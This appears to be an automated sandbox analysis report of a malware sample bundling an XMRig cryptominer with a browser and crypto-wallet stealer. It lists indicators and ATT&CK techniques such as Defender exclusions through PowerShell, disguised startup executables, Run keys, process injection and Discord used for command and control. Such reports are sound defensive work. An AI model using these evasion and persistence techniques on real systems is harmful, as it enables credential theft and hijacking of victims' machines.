xmrig | hxxps://gofile[.]io/d/xuEKgb

Analysis

max time kernel
590s
max time network
600s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
22-05-2024 23:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/xuEKgb

Score

10^/10

xmrig evasion execution miner persistence pyinstaller spyware stealer upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1736-341-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1736-339-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1736-342-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1736-344-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1736-343-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1736-338-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1736-345-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

992 powershell.exe
4508 powershell.exe
5400 powershell.exe
3796 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
992	powershell.exe
4508	powershell.exe
5400	powershell.exe
3796	powershell.exe

Drops startup file 4 IoCs

Processes:

System32.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe	System32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Spotify Update.exe	System32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Processer 2021.exe	System32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe	System32.exe

Executes dropped EXE 24 IoCs

Processes:

SilverBulletV1.4.EXEnyrox.EXEnyrox.EXEnum3.EXEnum2.EXEjhi_service.exeMicrosoftEdgeUpdater.exekanilzbpgdul.exefdjrmaypnxal.exenum1.EXEsvchost.exeSystem32.exeSilverBulletV1.4.EXEnyrox.EXEnyrox.EXEnum3.EXEnum2.EXEjhi_service.exeMicrosoftEdgeUpdater.exekanilzbpgdul.exenum1.EXEfdjrmaypnxal.exesvchost.exesvchost.exe

pid	process
4220	SilverBulletV1.4.EXE
3000	nyrox.EXE
2584	nyrox.EXE
3512	num3.EXE
2528	num2.EXE
1808	jhi_service.exe
4824	MicrosoftEdgeUpdater.exe
3868	kanilzbpgdul.exe
6136	fdjrmaypnxal.exe
3120	num1.EXE
4076	svchost.exe
5156	System32.exe
4668	SilverBulletV1.4.EXE
5928	nyrox.EXE
4792	nyrox.EXE
3156	num3.EXE
4392	num2.EXE
3020	jhi_service.exe
2060	MicrosoftEdgeUpdater.exe
4272	kanilzbpgdul.exe
1592	num1.EXE
656	fdjrmaypnxal.exe
512	svchost.exe
912	svchost.exe

Loads dropped DLL 64 IoCs

Processes:

nyrox.EXESystem32.exeSystem32.exenyrox.EXE

pid	process
2584	nyrox.EXE
2584	nyrox.EXE
2584	nyrox.EXE
2584	nyrox.EXE
2584	nyrox.EXE
2584	nyrox.EXE
2584	nyrox.EXE
2584	nyrox.EXE
2584	nyrox.EXE
2584	nyrox.EXE
2584	nyrox.EXE
2584	nyrox.EXE
2584	nyrox.EXE
2584	nyrox.EXE
2584	nyrox.EXE
3460	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
5156	System32.exe
4792	nyrox.EXE
4792	nyrox.EXE

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1736-334-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1736-335-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1736-337-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1736-341-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1736-339-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1736-342-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1736-344-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1736-343-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1736-338-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1736-336-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1736-333-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1736-345-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/912-2713-0x00007FFB0BF90000-0x00007FFB0C655000-memory.dmp	upx
behavioral1/memory/912-2799-0x00007FFB29410000-0x00007FFB2941F000-memory.dmp	upx
behavioral1/memory/912-2798-0x00007FFB234C0000-0x00007FFB234E5000-memory.dmp	upx
behavioral1/memory/912-2800-0x00007FFB22FF0000-0x00007FFB2300A000-memory.dmp	upx
behavioral1/memory/912-2801-0x00007FFB21600000-0x00007FFB2162D000-memory.dmp	upx
behavioral1/memory/912-2808-0x00007FFB28300000-0x00007FFB2830D000-memory.dmp	upx
behavioral1/memory/912-2825-0x00007FFB27140000-0x00007FFB2714D000-memory.dmp	upx
behavioral1/memory/912-2824-0x00007FFB22380000-0x00007FFB22399000-memory.dmp	upx
behavioral1/memory/912-2826-0x00007FFB270B0000-0x00007FFB270BD000-memory.dmp	upx
behavioral1/memory/912-2823-0x00007FFB1C0F0000-0x00007FFB1C125000-memory.dmp	upx
behavioral1/memory/912-2828-0x00007FFB215E0000-0x00007FFB215F4000-memory.dmp	upx
behavioral1/memory/912-2829-0x00007FFAFA4D0000-0x00007FFAFA9F9000-memory.dmp	upx
behavioral1/memory/912-2830-0x00007FFB15170000-0x00007FFB151A3000-memory.dmp	upx
behavioral1/memory/912-2831-0x00007FFB0CC90000-0x00007FFB0CD5D000-memory.dmp	upx
behavioral1/memory/912-2848-0x00007FFB12630000-0x00007FFB12646000-memory.dmp	upx
behavioral1/memory/912-2849-0x00007FFB12610000-0x00007FFB12622000-memory.dmp	upx
behavioral1/memory/912-2847-0x00007FFB0BF90000-0x00007FFB0C655000-memory.dmp	upx
behavioral1/memory/912-2851-0x00007FFB234C0000-0x00007FFB234E5000-memory.dmp	upx
behavioral1/memory/912-2857-0x00007FFB29540000-0x00007FFB2954B000-memory.dmp	upx
behavioral1/memory/912-2856-0x00007FFB230D0000-0x00007FFB23157000-memory.dmp	upx
behavioral1/memory/912-2864-0x00007FFB29460000-0x00007FFB29487000-memory.dmp	upx
behavioral1/memory/912-2865-0x00007FFB28300000-0x00007FFB2830D000-memory.dmp	upx
behavioral1/memory/912-2866-0x00007FFB11870000-0x00007FFB1198B000-memory.dmp	upx
behavioral1/memory/912-2896-0x00007FFB23C40000-0x00007FFB23C64000-memory.dmp	upx
behavioral1/memory/912-2895-0x00007FFB29430000-0x00007FFB29448000-memory.dmp	upx
behavioral1/memory/912-2920-0x00007FFB28340000-0x00007FFB2834B000-memory.dmp	upx
behavioral1/memory/912-2919-0x00007FFB23E40000-0x00007FFB23E4B000-memory.dmp	upx
behavioral1/memory/912-2935-0x00007FFB23030000-0x00007FFB2303B000-memory.dmp	upx
behavioral1/memory/912-2934-0x00007FFB23050000-0x00007FFB2305E000-memory.dmp	upx
behavioral1/memory/912-2933-0x00007FFB23040000-0x00007FFB2304C000-memory.dmp	upx
behavioral1/memory/912-2932-0x00007FFB23060000-0x00007FFB2306C000-memory.dmp	upx
behavioral1/memory/912-2931-0x00007FFB23070000-0x00007FFB2307C000-memory.dmp	upx
behavioral1/memory/912-2930-0x00007FFB231A0000-0x00007FFB231AB000-memory.dmp	upx
behavioral1/memory/912-2929-0x00007FFB235E0000-0x00007FFB235EC000-memory.dmp	upx
behavioral1/memory/912-2943-0x00007FFB29460000-0x00007FFB29487000-memory.dmp	upx
behavioral1/memory/912-2945-0x00007FFB22F80000-0x00007FFB22F8C000-memory.dmp	upx
behavioral1/memory/912-2944-0x00007FFB22F90000-0x00007FFB22FA2000-memory.dmp	upx
behavioral1/memory/912-3021-0x00007FFB114A0000-0x00007FFB116E5000-memory.dmp	upx
behavioral1/memory/912-3020-0x00007FFB29490000-0x00007FFB294BE000-memory.dmp	upx
behavioral1/memory/912-3019-0x00007FFB294C0000-0x00007FFB294E9000-memory.dmp	upx
behavioral1/memory/912-2942-0x00007FFB22FB0000-0x00007FFB22FBD000-memory.dmp	upx
behavioral1/memory/912-2941-0x00007FFB22FC0000-0x00007FFB22FCC000-memory.dmp	upx
behavioral1/memory/912-2940-0x00007FFB23010000-0x00007FFB2301C000-memory.dmp	upx
behavioral1/memory/912-2939-0x00007FFB23020000-0x00007FFB2302B000-memory.dmp	upx
behavioral1/memory/912-2928-0x00007FFB0CC90000-0x00007FFB0CD5D000-memory.dmp	upx
behavioral1/memory/912-2927-0x00007FFB15170000-0x00007FFB151A3000-memory.dmp	upx
behavioral1/memory/912-2918-0x00007FFB28330000-0x00007FFB2833C000-memory.dmp	upx
behavioral1/memory/912-2917-0x00007FFB29420000-0x00007FFB2942B000-memory.dmp	upx
behavioral1/memory/912-2916-0x00007FFAFA4D0000-0x00007FFAFA9F9000-memory.dmp	upx
behavioral1/memory/912-2915-0x00007FFB215E0000-0x00007FFB215F4000-memory.dmp	upx
behavioral1/memory/912-2899-0x00007FFB116F0000-0x00007FFB1186E000-memory.dmp	upx
behavioral1/memory/912-3082-0x00007FFB111C0000-0x00007FFB114A0000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

SilverBulletV1.4.EXEnum3.EXEnum2.EXEnum1.EXESilverBulletV1.4.EXEnum3.EXEnum2.EXEnum1.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	SilverBulletV1.4.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	num3.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	num2.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	num1.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	SilverBulletV1.4.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	num3.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	num2.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	num1.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 30 IoCs

Web Service

T1102

Processes:

flow	ioc
93	discord.com
131	discord.com
144	discord.com
89	discord.com
139	discord.com
143	discord.com
90	discord.com
129	discord.com
132	discord.com
134	discord.com
142	discord.com
87	discord.com
91	discord.com
140	discord.com
216	discord.com
209	raw.githubusercontent.com
210	raw.githubusercontent.com
217	discord.com
130	discord.com
135	discord.com
137	discord.com
138	discord.com
141	discord.com
88	discord.com
94	discord.com
95	discord.com
136	discord.com
92	discord.com
133	discord.com
218	discord.com

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

78 api.ipify.org
79 api.ipify.org

flow	ioc
78	api.ipify.org
79	api.ipify.org

Drops file in System32 directory 5 IoCs

Processes:

MicrosoftEdgeUpdater.exepowershell.exefdjrmaypnxal.exeMicrosoftEdgeUpdater.exe

description	ioc	process
File opened for modification	C:\Windows\system32\MRT.exe	MicrosoftEdgeUpdater.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	fdjrmaypnxal.exe
File opened for modification	C:\Windows\system32\MRT.exe	MicrosoftEdgeUpdater.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

kanilzbpgdul.exeMicrosoftEdgeUpdater.exefdjrmaypnxal.exeMicrosoftEdgeUpdater.exe

description	pid	process	target process
PID 3868 set thread context of 4908	3868	kanilzbpgdul.exe	conhost.exe
PID 3868 set thread context of 1736	3868	kanilzbpgdul.exe	svchost.exe
PID 4824 set thread context of 3036	4824	MicrosoftEdgeUpdater.exe	dialer.exe
PID 6136 set thread context of 6092	6136	fdjrmaypnxal.exe	dialer.exe
PID 6136 set thread context of 6112	6136	fdjrmaypnxal.exe	dialer.exe
PID 6136 set thread context of 4012	6136	fdjrmaypnxal.exe	dialer.exe
PID 2060 set thread context of 1976	2060	MicrosoftEdgeUpdater.exe	dialer.exe

Launches sc.exe 32 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
6056	sc.exe
4024	sc.exe
4640	sc.exe
4304	sc.exe
4536	sc.exe
5460	sc.exe
5424	sc.exe
3020	sc.exe
2612	sc.exe
3844	sc.exe
6064	sc.exe
2840	sc.exe
4728	sc.exe
4212	sc.exe
2372	sc.exe
3136	sc.exe
4556	sc.exe
2444	sc.exe
3336	sc.exe
3148	sc.exe
5940	sc.exe
5700	sc.exe
4544	sc.exe
4792	sc.exe
5276	sc.exe
1080	sc.exe
6020	sc.exe
5332	sc.exe
4948	sc.exe
2324	sc.exe
6032	sc.exe
820	sc.exe

Detects Pyinstaller 2 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXE	pyinstaller
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe	pyinstaller

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exeOfficeClickToRun.exepowershell.exelsass.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	lsass.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	lsass.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	lsass.exe

Modifies registry class 64 IoCs

Processes:

chrome.exechrome.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\MRUListEx = ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	chrome.exe
